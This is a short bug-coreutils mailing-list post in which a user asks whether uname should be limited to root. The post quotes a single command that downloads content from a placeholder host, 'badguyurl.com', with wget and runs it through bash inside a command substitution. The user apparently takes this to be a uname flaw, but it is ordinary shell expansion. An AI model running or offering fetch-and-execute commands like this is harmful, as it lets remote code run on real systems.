bug#24328: uname exploit

bug-coreutils

From:	Shane
Subject:	bug#24328: uname exploit
Date:	Mon, 29 Aug 2016 02:25:03 -0500
User-agent:	Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0

Hi, I am unsure if you have seen this, but I am concerned about this -can or should uname be restricted to root use only?


uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"

[Prev in Thread]

Current Thread

[Next in Thread]

bug#24328: uname exploit, Shane <=
- bug#24328: uname exploit, Evan J Johnson, 2016/08/29
- bug#24328: uname exploit, Paul Eggert, 2016/08/29